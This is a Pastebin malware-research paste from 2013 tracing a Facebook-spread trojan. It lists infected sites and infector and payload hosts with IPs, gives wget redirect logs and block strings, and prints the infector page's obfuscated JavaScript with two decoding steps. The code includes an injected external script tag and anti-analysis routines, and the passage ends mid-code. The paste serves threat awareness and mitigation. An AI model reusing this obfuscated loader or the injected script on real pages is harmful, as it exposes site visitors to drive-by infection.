Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMUSTDie!
- // FaceBook IM & Web Driven Facebook Trojan with DGA Downloader
- // Infector: 67.228.248.34 (kemslispragmatic.com)...
- // Payload Mothership: 103.246.115.238
- // Block Mitigation String (PAYLOAD)= "best.lt.ua/dlimage4.php"
- // Block Mitigation String (Infector) = "/hwaf.html?h="
- // This Research was conducted by MalwareMustDie, NPO
- // An openly shared material, can and welcome to be used
- // for your threat awareness.
- // But please Mention if you make referer of this to your -
- // official Blog/Writing. With thank's in advance - @unixfreaxjp -
- // Special thank's to URLQuery, Virus Total; with your dedicated great servicewe can detect "EVERYTHING" :-)
- @unixfreaxjp /malware]$ date
- Fri Nov 8 06:26:19 JST 2013
- =========================
- INFECTION ROUTE #1:
- FACEBOOK LINKS
- =========================
- 6/39 2013-07-16 01:24:06
- [100]http://olivechurchministry.com/ocef.html?h=2282017
- 5/39 2013-07-16 01:24:06
- [101]http://olivechurchministry.com/ovdt.html?h=2594522
- 5/39 2013-07-16 01:24:05
- [102]http://olivechurchministry.com/zwmd.html?i=629980
- 5/39 2013-07-16 01:24:06
- [103]http://olivechurchministry.com/zlnv.html?i=2382766
- 5/39 2013-07-16 01:24:05
- [104]http://olivechurchministry.com/zwmd.html?h=744758
- 7/39 2013-07-16 01:23:54
- =========================
- INFECTION ROUTE #2:
- INFECTED SITES
- =========================
- // check
- http://www.speedway.ne.jp/%7Esaburo/
- // injected...
- [...]
- </table><!--339810--><script type="text/javascript">var gwloaded = false;</script>
- <script src="http://9d.home.pl/pub/pOFBT2NP.php" type="text/javascript"></script><!--/339810-->
- [...]
- // links...
- 4/50 2013-11-07 06:52:00 [35]http://9d.home.pl/pub/pOFBT2NP.php
- 3/50 2013-11-06 11:59:11 [36]http://9d.home.pl/pub
- 1/50 2013-11-06 02:06:16 [37]http://9d.home.pl/pub/pofbt2np.php
- // fetch w/o java
- --2013-11-08 04:48:52-- http://9d.home.pl/pub/pOFBT2NP.php
- Resolving 9d.home.pl (9d.home.pl)... 79.96.233.122
- Caching 9d.home.pl => 79.96.233.122
- Connecting to 9d.home.pl (9d.home.pl)|79.96.233.122|:80... connected.
- ---request begin---
- GET /pub/pOFBT2NP.php HTTP/1.1
- Referer: http://www.speedway.ne.jp/%7Esaburo/
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 301 Moved
- Connection: Keep-Alive
- Content-Length: 202
- Content-Type: text/html
- Date: Thu, 07 Nov 2013 19:48:53 GMT
- Location: http://kemslispragmatic.com/hwaf.html?h=582878
- Server: IdeaWebServer/v0.80
- ---response end---
- 301 Moved
- Registered socket 3 for persistent reuse.
- Location: http://kemslispragmatic.com/hwaf.html?h=582878 [following]
- Skipping 202 bytes of body: [<HTML>
- <HEAD>
- <TITLE>301 Moved</TITLE>
- </HEAD>
- <BODY BGCOLOR=#FFFFFF>
- <H1>301 Moved</H1>
- The document has moved <A HREF="http://kemslispragmatic.com/hwaf.html?h=582878">here</A>.
- </BODY>
- </HTML>
- ] done.
- URI content encoding = None
- --2013-11-08 04:48:53-- http://kemslispragmatic.com/hwaf.html?h=582878
- conaddr is: 79.96.233.122
- Resolving kemslispragmatic.com (kemslispragmatic.com)... 67.228.248.34
- Caching kemslispragmatic.com => 67.228.248.34
- Found kemslispragmatic.com in host_name_addresses_map (0x288041c0)
- Connecting to kemslispragmatic.com (kemslispragmatic.com)|67.228.248.34|:80... connected.
- ---request begin---
- GET /hwaf.html?h=582878 HTTP/1.1
- Referer: http://www.speedway.ne.jp/%7Esaburo/
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 404 Not Found
- Date: Thu, 07 Nov 2013 19:48:54 GMT
- Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
- Content-Length: 523
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=iso-8859-1
- [...]
- // fetch w/ java
- same result.
- // check the landing page.
- Name: kemslispragmatic.com
- Address: 67.228.248.34
- ============================
- INFECTOR HOST: 67.228.248.34
- ============================
- // domains...
- The server returned the following data:
- [6]kemslispragmatic.com A [7]67.228.248.34
- [8]kemslispragmatic.com NS [9]ns11.syskay.com
- [10]kemslispragmatic.com NS [11]ns12.syskay.com
- // Possibly variation iof URL.. checked:
- $ ipchk urlq hwaf.html
- -----------------------------------------------------------
- ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
- -----------------------------------------------------------
- Infection Record Source : urlq vt
- -----------------------------------------------------------
- 2013-11-07 04:15:56
- 1 / 1 [7]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-11-06 07:07:58
- 1 / 0 [8]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-11-06 07:06:25
- 0 / 0 [9]http://kemslispragmatic.com/hwaf.html?h=58287
- 2013-10-31 18:18:31
- 1 / 1 [10]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-10-31 15:44:52
- 1 / 1 [11]http://kemslispragmatic.com/hwaf.html?h=582878
- 2013-10-30 21:49:11
- 1 / 1 [12]http://kemslispragmatic.com/hwaf.html?h=582878
- 2/50 2013-11-06 06:07:10
- [56]http://kemslispragmatic.com/hwaf.html?h=582878
- 1/39 2013-09-17 11:02:59
- [64]http://kemslispragmatic.com/hlft.html?i=3343031
- 1/39 2013-07-21 18:58:02
- [89]http://kemslispragmatic.com/hwaf.html?i=3204044
- ===========================
- INFECTOR HTML
- ===========================
- // fetched sample's codes:
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta http-equiv='
- x-ua-compatible' content='EmulateIE9'><script>l1l=document.all;var f9f76ca8b6=true;ll1=docum
- ent.layers;lll=window.sidebar;f9f76ca8b6=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.us
- erAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')
- |lI1('per');f9f76ca8b6|=lII;n6V6vun=new Array();n6V6vun[0]='%68c%65\170\131%38\105\171%67%4D
- nP%36\156%62' ;p2oWy1B=new Array();p2oWy1B[0]=' <HTML><head~script>e
- val(une~\rape(\'\\166ar%20q%79%37~/D~(~12~13B~+~-~/8~2%5
- 3t~,2ing~(Ef~C~"57~L5C%68a~CCod~"45~(~=31~/3~(~Q~_~/0~(~.~8~R6~RF~
- C~]i~>3~g~8~q3~d2~/~y~0~/~iB~L~`2B~(}2~.7~9~,~i~5}3D~"6~`~;3~=7~3~8fu~L~l
- 6~A}za~m}~(~*y~/~l2~=}~,~15~`~$~]~(}.4~L~1}}},~\\6}9E~B2E~Z1l~R~Q})}d~mc}
- 5me}}=Ew}~D~,4~R~\\}\'}1~"7~`~|}E~3}~/}}\\}$3}&}(~~f}Jn~Z3}}3},1o}!~)~:
- ~i~.}\'~h}*}[2}3~i~32~{Cs~(~y}|p}@~RE}"~,~b74yle~>~6~R}p}-s|\n},}p41}eAn
- o~~4~/|\r~w}~g7~y}:|\'|}~,}}|1|~/}D~n70r~Z~\\3|(|8}~b|6||pan|/|6~j7A~v~
- {~36Eew}"~"0}~y|,~R| }0~6}@ft|=rB|67~E|&2}D}52}M146}4}R|o05n}G||k~4|~
- $te|<1|v|||j|l~R|-5}j},~N~#}}|p~\\4|n~R}59|I|z~~~,|N~a~>|R|o|g}"A~\'|,a}[}}({\r5
- 0|b}8~L}U|z|lh}V~\n{~4b|s|p||j~~~Z}|9|8k~r~t}6}\r~dDz}~|CE}B}:~F{,{*}b~L|C}}
- }}+|,~v}U}|{84|}K}V|}O~G|.|%~[{.|o55|=}l~#}U7~b{}\nT{%|p~14Eam|=~]z~R~i~b
- 5B{B5|{<|p{>}R~]j{C{S},|~>|M{[~H}C{|Rg}o{2~8~L|{V}z}fo~\'}\'~v}{D~v{H{~u|5{W}*z
- ~J}X1{Z~/}Uz~RA~?z }*zzzzzz69}s|=z\r||W}Z{9j{x{`}V}NH~?}U4}1|pzza}~~yz}
- zC|kzzE~}z"}`zf~,zg~8\'))</~\r~~~~~~n|=\'Old brows{za!\';dl=
- docu}Lnt.lay{zas;oe=w~Eyw.o~ra?1:0yay\nyyey.~l&&!y;
- gyyy\ryyy8t{Mey<ById;yyyy.sideb~&?true:f~y;tN=navig
- atz%.uyrAy8y/yfLy{zaCay();izy^y].yexOf~ ~t~~zk>=0ySyUyWyYly[z?
- s=y|y~xzax\'myMe 7xx\nxyVyXyZe;x8xNy}|xyx~ xix8xxyTx"xxis|=x\'
- yxxyy3!yyN){quogy \'iuy\'};~r xgzyy}ncti|$ ~myv{return
- x6exRy|xyK|${zayzaxU=xayAx&OFyIxqylyyex_n.pyzayfcolx+yOx("fi|")!=
- -1x!xx$yx7fx=x:xBzx{wx#xx%ixdaxFy:y-y/|$dy#gst~&t=x[x]w xdxfxhxj x8xn;w
- :x^x`cIExd(xWyww?xixkwCxRwFw<ccxdw.y<y x\\|$|xtyu=wIE;ytTi}LoutwwWyv"
- ,~)0)xRwqwwwE~w;wHNS(exFw)(y||yvxe.which==2vvvvv=3xFwMsgwO
- xgwQwBx$}v&x?vlw-y,w[c~w@eEvy.x(v2v4.MOUSEDOWxEyv,v8|$mwmyynwdw}e
- w\'{wZvEnvGyieupvLSxRvRw0w]yyway.wc~w Fw|wGnwwPwAwCwv(yxFwUx`yzavv\nvv3y/
- bwnyfvKvxF~{zawo\' zk;vmxk0xRu xlx\rv\\vDv^vUvIyvKyzawTviw<zw9xdxpyyLw6xhxuywhwj
- wlwnxsu)\',{0wvuv"wAxmxRvy5v{uyvvCy;vSueov3ry_u+u>w/yvFvHuBwnuF9ux\\vj
- u0(w,xeu4wRv%w{uRw<u1vwuYw@vkvw6ry>.w6gN{}ewnuly' ;cn7Nje='fu' ;aF8PX7b
- ='h1Pphs' ;vjtc7xF71='OuRaGIuGOOBqOjOESFEO' ;cn7Nje+='nction cHv346q'+'w049m0JYj(kRHf0
- 4n8u65'+'nG5ePB1){' ;qxZS473XYJ7R43='\166%61%72%20\154%32%3D\167i\156%64%6F\167%2Eo%70\14
- 5r\141%3F%31%3A%30%3B%66u\156ct%69\157n%20l%36b%38%61%63%36%37%66%39f%28%29%7Bi%66%28f%39\14
- 6%37%36%63a%38\142%36%29%7B%64o\143u\155%65n%74%2E\167r\151te%28%6C\117%29%7D%7D%3Bf%75n%63t
- i\157n%20%6C%33%28%6C%34%29%7B\154%35%3D%2F%7A\141%2Fg%3B%6C%36%3D%53t\162\151%6E%67%2E\146%
- 72o%6D\103%68\141\162%43\157d%65%28%30%29%3B\154%34%3D%6C%34%2E\162epl\141%63e%28l%35%2Cl%36
- %29%3Bv%61\162%20l%37%3Dnew%20A\162r\141\171%28%29%2Cl%38%3D%5F%31%3Dl%34%2Elen%67%74h%2C%6C
- %39%2C%6CI%2C%69\154%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C%6Ci%3D%27%27%3B\144%6F%7B
- %6C%39%3D\154%34%2Echa\162C%6Fd%65\101t%28%5F%31%29%3BlI%3D%6C%34%2E\143\150\141%72C%6Fd%65A
- t%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B' ;function w049m0JYjcHv346q(iCdIME){vjtc7xF71+=iC
- dIME};n6V6vun[0]+='y%61%36\156%55%75%34%37%34' ;p2oWy1B[0]+='2&uf~&uiukum}LyL~ rv~ ^
- (INPUT|TEXTAREA|BtTON|v=LECt~~)$zkwwwzvtxku2ubvvvvv1x
- FuyKv.~xiv1vzv5v7y/v:v<Ev:VEywt1yuKvVvGv3=uUv\'t%uT3t)vv\rt,vt/{tB.xf|ytt6v4sv
- 6t7v9v;v=t>t@yGyJtCvTuLtFyuqusv\' vyt0te.t3v0t9t8t^t;v=UP|tvt_t<v?vAtAtrtDuwvKt\'t
- dx~w\\uAvXtH3vNw\'tnxy8xBw+v+u?uuLvJtH1uQw}xknvkvxtUy>SvOes xFxTxlx}us&s(s yvujoSy
- T~Egu=vyxx.\'qw~ sdzxcx1vy|{Ph>4wvvQuyb~Xyx+~rtLzy.ywzav.vjtVv
- Oo~\nyvxRu&wkuMwo"s"wrwtu1wwxRsnywtKnixdtouXv]uJzws1xugw8tKw>uZv$w\'shxgu\'skwswsowusr
- ;r\rywszxByxBiwvsczy<\'+\'div w5|y"poyMvj:absw\nwnx%||a:wu10pxy\
- \y!r6u0r9r;ydth:6r@;~ycht:35r:x&-x:1">r\'rr~Epwnxly~="v|tv~"xa
- unrcxqqrh~lyVrcrh|$Clvkwdcdyvr$tr&rcybyMbwir:vdyOnrWr[\'/r!vrXuHw[w~
- |(fcsuuwHr{xdcrwpsU~&dDyeatstXrq\'w6sgu]s wW~xFrlqq*rxu=siu(slq3so~swvrwisj
- wmq=cq4wsq@qAv(x\'tqsyew6vtv~ |$wza~\nu.qy9wzznzpzuzszqttndzyuslI\'>s,ppw nw
- y(s,qY7xY;qYx(s6~~F.fyzamCh~&~WyO(13u/0u/p{suz%(ix\nyx<4|:yx++xFqs+=qw
- xRqg1Irc<"+"!--p$p"p(p$rW";Ip21rc/p.*p*y7p%p8p%p6p1qfp"zpp.q_p$qgp2p)+
- pGI(2pJ"zypFp2pMvp%rZzoztp.zrp0lp p!"<sp[|Hr~qzar x:pyy:|#~qi<we>p9p;pa/p
- r~zopdnpt;p^Iy ozaIpKIp pKp_p@zYp"p.||Hp~op^p"p6p%op}p0oopao\r|Gxkr%|zyqiqrwq
- q qqis@sBsDsFp$o1q0uSp^p xdoove {"y#y~ bez$xf|eg~Eu.\'a|a{zaoBoD,\'o>o@v1|xoE
- oG|rEoQywop y_|To9ro;~ rLmloE~qWoLsUdxPoLaoEwkgoEqoEo@moEw6b|oEq^~omnr^toE
- pupGp4ozauaywsytunxFv.y y&pTp!o8o:y(~-,nnp{snnnnn!{sywz~ k;nx2:no
- [vfno<},pn37u/5n31n7,9n<wt2n;},n$xfan\'n) 3n,pTn.o]o_p n2n2},n>nRn=n=|nA5nCn&
- n(tY 4nJp2nLn0(n2n4n4nR|n;nUn?nXnZnEyo?aurrMn-no^np ny,nzn|n{n~qKpGy nvo_pI,pTn:
- ol,omp moYm }Am ust/p1zY~s|.y>y@y<syC{wuluntoza[2])[0]wtmp2l[7m(wEpw8y
- (t<oYIyy.grDy\\pxFm=n[t]mqgy+sy=xgmt[m am"}Lm$p mFm3x]as\\om;sLm>hm4r(
- jpj<mYL;jmA{o@(xpxp;xmlvm&MyehwypN,xzl{o6~m\\[jm,xm.o[m>l4
- m(v&v\'opMoX}A~ywqflpoq:r qDu)\'o3lu.r?t$qxklxds,o6p!mwkmR~mm/mKuIy~Eks,wmD
- zYm]m=rDmy pTwm^lBqfo0v|pv*lp^y m~~ |mOy~ onml>mVp(wmHu8(qlqnf&pOxFyTylO}A
- y0qly.dpzawr|lIw~&v4N~XvxfpjaqGlqz|mUmlIzl}sauu:lyGvlLusxFoYlQsStsnDlU|y<lXolZo
- lE[p(usl`x!lbqm|$let/lhrljklm~|xllsmluxfylxyOscl|l~kr|klCp^kkhublsuSoltTs
- k,y_urlqvEkItkkLtUurw8kP;kCw<ll,~& vay#vhx\\1Cyyx\nkXx`pkFs,k^ak`c|kkdm6kg'
- ;cn7Nje+='eva' ;yulH3LhUKQoX741='ErsxrjlLDylFsLTN' ;cn7Nje+='l(unes' ;cjX6ODk='pc
- 565f485' ;cn7Nje+='cape(kRHf04n8u65nG5ePB1))}' ;eval(cn7Nje);i9uWnudk54='CWuJtOOvcgjYg
- JOlwOyp' ;cn7Nje='' ;qxZS473XYJ7R43+='%2B%5D%3D\154\111%2Bi%6C%2D%28l%39%3C%3C%37%29%7
- D%77%68%69%6C%65%28%5F%31%2B%2B%3C\154%38%29%3Bva%72%20l%31%3D%6E\145w%20Arra\171%28%29%2Cl%
- 30%3D\156e\167%20\101\162\162a\171%28%29%2C%49l%3D%31%32%38%3B\144o%7B\154%30%5B\111\154%5D%
- 3D%53tr%69n%67%2E\146ro%6D%43%68\141%72\103\157d\145%28I%6C%29%7D\167hi%6C\145%28%2D%2D%49l%
- 29%3BI%6C%3D%31%32%38%3Bl%31%5B%30%5D%3Dl\151%3D%6C%30%5Bl%37%5B%30%5D%5D%3B\154l%3Dl%37%5B%
- 30%5D%3B%5Fl%3D%31%3Bv\141r%20\154%5F%3Dl%37%2E%6Cen\147t\150%2D%31%3B%77%68i\154\145%28%5F\
- 154%3Cl%5F%29%7Bswi\164%63h%28l%37%5B%5F\154%5D%3CIl%3F%31%3A%30%29%7Bca\163%65%20%30%20%3Al
- %30%5BI%6C%5D%3D%6C%30%5Bl%6C%5D%2BS%74\162i\156%67%28l%30%5Bll%5D%29%2E\163u%62str%28%30%2C
- %31%29%3B\154%31%5B%5F\154%5D%3D\154%30%5B\111l' ;</script><script>eval(unescape('f%75nct
- ion%20n%39%37%51%42\125%20%20%20%20%28\165\113%34%6A\150\120Ga%36M%32%6CdH%31%29%7Br%34%30%3
- 2%35%6A\113%6A\126\123j\143%3D\165%4B%34\152h\120Ga%36M%32%6Cd\110%31%7D%3B'));rnNhBrLtGtlNy
- ='l' ;cjX6ODk+='p7uK6vc4zv2Adhe' ;p2oWy1B[0]+='l*mv,p,q{li{u8tUyMyOyQrxFv~Ey
- jtAdzOqGys[tzY1[pm,qsnxecwlRkeR|Hy8s3lSyee~Wv`w`u~Fw3kqv(vYx\njk1lwly
- x+j|eoO(u~f,vu7xj/tSjs~kTj7z%~j:j<q|irw5k.wzvj/pO{v~k,lpk9j9jjOj?vvjSj2k3j4
- jujExfjYj;v~w`So#rw~FsrkyeuxuuxFtJl) pLmcxFuEmzrDtV|Hyxcywqdo8q-q4ml mTrxmd=
- tSo=qys8q|q~pzaply(jm|fwzapr*25+}:kvOjiiq|imbi!d*l\'ryopoyi6i8=oj
- >mcj]xFi5i;i:i<u3ud iDs;rauBf kRq\ntvLx:|sYw\'~yOw~dzkkGqOiOt7iQw5y.{za~ qVi[mp
- ,wCwwi(xiI~oiLm~\ndiPiRicriUiWo?~Eei[sl7itivibsYieseigo3mikjinxripiLkRrfl}htvi
- zx,iYi~i\\hqQht7qTnifu.h l(u^khp n{npvdyaycyeygvVykymyyoyqrysyui\r(kyNyP~&xFh+2i
- =tUvq~u:h+sv(tUy!{zauXh+4i=isusy3nw=4hAp3ii=uwx-xsoG~&isHhZovi=(h+i)y3~h_
- wxMx{hfhgp4{urn}q]ztzr~zaoz~tKl$xdk|o3p4mmkv4yCyEieusqhljj`y]j4xftik.hkjwwk?v
- o^j{v&h~qa~TITt>Fl}yPookzng\'g)E~MEt NAg7rcGixh0rrhCtt NTrcg,qGsU
- g0tsomq\rg7g9g;g="Awnhz%gCgEEgGgIg-gLkgNgPg6g8Ag:g<ErcKeywz%dpc gDgGg]gH"Wy
- ,jzw\ng{asAr0}Lg{w w\ngQgfghgUD~hvjg[gug^gxy! Hyaxywmk]uDr$ey.?q\rjnk tWrcs
- gYkTy\rqbv|$rhhxfw"rLtp://fr/u!v-q)nE{}aihd.x/jLu~whp/yPfF/Ivn
- -CVe5TGKy}w rh/pzHtD~BODY>gfr`rb\'w_t/zO~gqitKy#xqmi~FhklAhs+k\\v
- ~&u#r.r{o?gvklm|#pqjLxhvwxyz\'yLpjq~ uu8lGf~h*f}=i+ig/mbi+fwiyv*ejLm<sM
- wzs,w5uE\'xZps,py(i<epp{e1pe+s[e"i-im{ifxe)eAe-m_)]hziFe1ks ymDgOf@s#{e0i
- zyf2f4f6re\'gOfzs96pJeo>w5yyj(qrwml24fIp?eaiecs7f{pOrzy+ebfyeys9hYkMy/qq~rZ
- w)y#}Lr$u~rcrsCgOrrhrBrDrc0f-erKw8"dwBdg.ryOuEdq\r/d\nunrXywxReUeW~Eyvg$q_~zaov|i
- MyNd"u0%ddrcd:rhsUd"{zadrhqGusocs8dDq2vOl|Gq\ndJd% ~ycvK"joTq\rtohy~yTz~gw
- wzad$#~85998d<ed8dd^z}dTgdVr4trodrdVdX{zaq\rIMG SRCrce^f5f7f9wcf<y0kf?f
- AfCfEfGces/v2fLX/x/Qq6L1pQrYrw~FrhfeRDERdKALgwd&t~znyTd^xUbdaw\n
- z%rc#E7EBF2dZdqrwdsrcdzgB rpdUcJv4d{~z$yv$qGrcrqdIw+eTe\'e,w6gYep,uDw+y`,hd~d
- Ec<dd0E}5FrhyMzr\'+4q\rB>eVsifdS|xk]xs)r2xl~cVg.g0dSqlg{pjsBuo Yfyusz~xsx
- iwx:i~ :zm/cyzncT~c6c5/c7<d_c:dbc="c?cAcCcEdpdScHdycQcLcNcI"yfpq\rb!bcXucZac\\i
- c^c`eWcc{zaceacg~ciq2ckc>3bRbSrWbxi vJc}f&wmz|br~w7s8tnxk2fqngq.bhb w^fdRbl~ggH
- tx|"frytf:ms`w|$.f.o?l6w[bzsbb~f;b<w^b>"cYyNbBgc]c_acabKcd|HbKchlcjdcc>cmcocqfd
- >IiLfbWbYhbXysnfnb_kTbtXnq!rx ~xfznbf7bkznApzc4a<ra<d\\a<r.|fipbfkhyfnvafqy
- abvqaqikir"bywaf/e]rfe_/ycki~l{z%yw otws1wusqd1gzaa6fffhzns[>' ;w049m0JYjcHv
- 346q('j4VG01D212');qxZS473XYJ7R43+='%5D%3Bif%28l%32%29%7B%6Ci%2B%3D%6C%30%5BIl%5D%7D%3B%62re
- %61k%3Bd%65f\141%75\154\164%3A\154%31%5B%5F\154%5D%3Dl%30%5B%6C%37%5B%5F%6C%5D%5D%3B%69%66%2
- 8l%32%29%7B%6C\151%2B%3D\154%30%5B%6C%37%5B%5Fl%5D%5D%7D%3B\154%30%5BI\154%5D%3Dl%30%5B\154l
- %5D%2BS%74%72\151ng%28l%30%5Bl%37%5B%5F\154%5D%5D%29%2Es%75%62\163t\162%28%30%2C%31%29%3B%62
- %72e\141\153%7D%3B%49%6C%2B%2B%3Bll%3D%6C%37%5B%5Fl%5D%3B%5F%6C%2B%2B%7D%3Bi%66%28%21\154%32
- %29%7Br\145%74urn%28\154%31%2E\152oin%28%27%27%29%29%7D\145\154se%7B%72et%75%72\156%20%6Ci%7
- D%7D%3B%76a%72%20lO%3D%27%27%3B\146%6Fr%28\151%69%3D%30%3B%69%69%3C%70%32o%57y%31%42%2E\154e
- \156\147t\150%3Bi%69%2B%2B%29%7BlO%2B%3D\154%33%28p%32%6F%57\171%31\102%5B\151i%5D%29%7D%3B\
- 154%36\142%38\141\143%36%37f%39%66%28%29%3B' ;i9uWnudk54 ='OOhrEONOvMjmgCTBHfvBtHNTj
- OsX' ;qF7u2oYdq1wbJ='kI03H2w13x' ;w049m0JYjcHv346q (yulH3LhUKQoX741);cHv346qw049m0J
- Yj (qxZS473XYJ7R43);n97QBU (qxZS473XYJ7R43);o38iRr2IxdH5Wn8='vjDJ5wc2fj0fy3H3es7e7DDy' ;
- eval(unescape('%71%79%36%28%29%3B'));rnNhBrLtGtlNy+='rhmQEknosQONOwmOjwVRgvMfPaYBOGQRPPfnLOO
- OuDdOOGyEQMpHOhUCnuXp' ;cjX6ODk+='s9CJ8bJ8' ;</script></head><body></body></html>
- // Decoded first step:
- var l2 = window.opera ? 1 : 0;
- function l6b8ac67f9f()
- {
- if (f9f76ca8b6)
- {
- document.write(lO)
- }
- };
- function l3(l4)
- {
- l5 =/ za / g;
- l6 = String.fromCharCode(0);
- l4 = l4.replace(l5, l6);
- var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
- do
- {
- l9 = l4.charCodeAt(_1);
- lI = l4.charCodeAt( ++ _1);
- l7[I ++ ] = lI + il - (l9 << 7)
- }
- while (_1 ++< l8);
- var l1 = new Array(), l0 = new Array(), Il = 128;
- do
- {
- l0[Il] = String.fromCharCode(Il)
- }
- while ( -- Il);
- Il = 128;
- l1[0] = li = l0[l7[0]];
- ll = l7[0];
- _l = 1;
- var l_ = l7.length - 1;
- while (_l < l_)
- {
- switch(l7[_l] < Il ? 1 : 0)
- {
- case0 : l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
- l1[_l] = l0[Il];
- if (l2)
- {
- li += l0[Il]
- };
- break ;
- default : l1[_l] = l0[l7[_l]];
- if (l2)
- {
- li += l0[l7[_l]]
- };
- l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
- break
- };
- Il++;
- ll = l7[_l];
- _l ++
- };
- if (!l2)
- {
- return (l1.join(''))
- }
- else
- {
- return li
- }
- };
- var lO = '';
- for (ii = 0; ii < p2oWy1B.length; ii ++ )
- {
- lO += l3(p2oWy1B[ii])
- };
- l6b8ac67f9f();
- // Decoded Second Step (extracted values / written):
- <HTML><head><script>eval(unescape('
- \166ar%20q%79%37%3D%27%27%3Bq%79%38%3D%53t%72ing%2Ef%72\157\155C%68a%72Cod\145%28%31%33%2C
- %31%30%29%3B%66%6F%72%28i%3D%30%3Bi%3C%32%32%37%39%3B\151%2B%2B%29%7Bq%79%37%2B%3D\161%79%
- 38%7D%3Bfu\156%63t\151%6F\156%20qy%36%28%29%7B\151%66%28%21%64\157%63u\155%65%6Et%2E\141l%
- 6C%29%7Bd%6Fc\165me\156t%2Ew\162i%74%65%28\161\171%37%29%7D%7D%3B%71y%36%28%29%3Bf\165n\14
- 3\164\151o\156%20q%79%39%28%29%7B\172\151%39%3D%22%3Cs%22%2B%22p\141%6E%20%73%74yle%3D%27%
- 64\151sp\154\141y%3Anone%27%3E%3C\160%72%65%3E%22%2B%71%79%37%2B%22%3C%2F%70r\145%3E%3C%2F
- \163%22%2B%22pan%3E%22%3B%7Ai%32%3D%6Eew%20\101%72%72%61y%28%27\141ft\145rBe%67in%27%2C%27
- %62e\146\157\162e\105nd%27%2C%27\141%66ter\105%6E%64%27%2C%27%62%65f\157\162\145%42e%67%69
- n%27%29%3B%7Ai%33%3D%6Ee\167%20Ar%72a\171%28%27\150t\155\154%27%2C%27h%65ad%27%2C%27b\157\
- 144y%27%29%3B\146%6F%72%28k%3D%30%3B%6B%3C%3Dz\151%33%2El%65ngt\150%3B\153%2B%2B%29%7B\172
- i%34%3D%64\157\143%75m%65%6Et%2Eg%65%74%45\154e\155\145n\164%73%42%79Ta\147%4Eam\145%28z%6
- 9%33%5Bk%5D%29%3B\146%6F\162%28j%3D%30%3B\152%3C%3D%7Ai%34%2E%6C\145%6Eg\164h%3B\152%2B%2B
- %29%7Bfor%28i%3D%30%3Bi%3C%3D%33%3Bi%2B%2B%29%7B%69f%28\172i%34%5B%6A%5D%29%7Bzi%34%5Bj%5D
- %2E%69\156s\145\162%74\101\144ja\143%65\156tH%54%4D\114%28z\151%32%5B\151%5D%2Cz%69%39%29%
- 7D%7D%7D%7D%7D%3B'))</script><script>nsp = 'Old browser!';
- dl = document.layers;
- oe = window.opera ? 1 : 0;
- da = document.all &&! oe;
- ge = document.getElementById;
- ws = window.sidebar ? true : false;
- tN = navigator.userAgent.toLowerCase();
- izN = tN.indexOf('netscape') >= 0 ? true : false;
- zis = tN.indexOf('msie 7') >= 0 ? true : false;
- zis8 = tN.indexOf('msie 8') >= 0 ? true : false;
- zis |= zis8;
- if (ws &&! izN)
- {
- quogl = 'iuy'
- };
- var msg = '';
- function nem()
- {
- return true
- };
- window.onerror = nem;
- zOF = window.location.protocol.indexOf("file") !=- 1 ? true : false;
- i7f = zis &&! zOF ? true : false;
- if (da)
- {
- document.ondragstart = function ()
- {
- return false
- };
- function cIE()
- {
- (msg);
- return false
- };
- function cc()
- {
- document.oncontextmenu = cIE;
- setTimeout("cc()", 200)
- };
- cc()
- };
- function cNS(e)
- {
- if (dl || ws)
- {
- if (e.which == 2 || e.which == 3)
- {
- (msg);
- return false
- }
- }
- };
- if (dl)
- {
- document.captureEvents(Event.MOUSEDOWN);
- document.onmousedown = cNS
- }
- else
- {
- document.onmouseup = cNS
- };
- document.oncontextmenu = new Function("return false");
- if (oe)
- {
- function ro(e)
- {
- if (event.button == 2)
- {
- alert(' ');
- return 0
- };
- return true
- };
- document.onmousedown = ro
- };
- function ns9()
- {
- window.status = ' ';
- setTimeout('ns9()', 1000);
- return true
- };
- if (!oe)
- {
- ns9();
- document.onmouseover = ns9;
- document.onmouseout = ns9
- };
- function u0(a)
- {
- return false
- };
- function u1(e)
- {
- return (e.target.tagName != null && e.target.tagName.search(
- '^(INPUT|TEXTAREA|BUTTON|SELECT|HTML)$') !=- 1)
- };
- function u2(e)
- {
- if (e.which == 1)
- {
- window.captureEvents(Event.MOUSEMOVE);
- window.onmousemove = u0
- }
- };
- function u3(e)
- {
- if (e.which == 1)
- {
- window.releaseEvents(Event.MOUSEMOVE);
- window.onmousemove = null
- }
- };
- if (dl)
- {
- window.captureEvents(Event.MOUSEUP | Event.MOUSEDOWN);
- window.onmousedown = u2;
- window.onmouseup = u3
- }
- else if (ge &&! da)
- {
- document.onmousedown = u1
- };
- function nn()
- {
- if (window.getSelection)
- {
- var t = window.getSelection().toString();
- if (t.indexOf('qweasdzxc') > 1 || t.length > 40)
- {
- document.body.innerHTML = '.';
- location.reload()
- };
- setTimeout("nn()", 200)
- }
- };
- nn();
- function ni()
- {
- if (da)
- {
- document.onselectstart = function ()
- {
- return false
- };
- setTimeout("ni()", 200)
- }
- };
- ni();
- if (da &&! oe &&! i7f)
- {
- fc = '<' +
- 'div style="position:absolute;left:-1000px;top:-1000px;width:60px;height:35px;z-index:1">' + '<+
- 'input type="button" name="xqq" value="" onClick=ccd() style="visibility:hidden"><' + '/div>';
- document.write(fc);
- function ccd()
- {
- clipboardData.clearData()
- };
- function cce()
- {
- xqq.click();
- setTimeout("cce()", 300)
- };
- setTimeout("cce()", 3000)
- };
- if (zis8)
- {
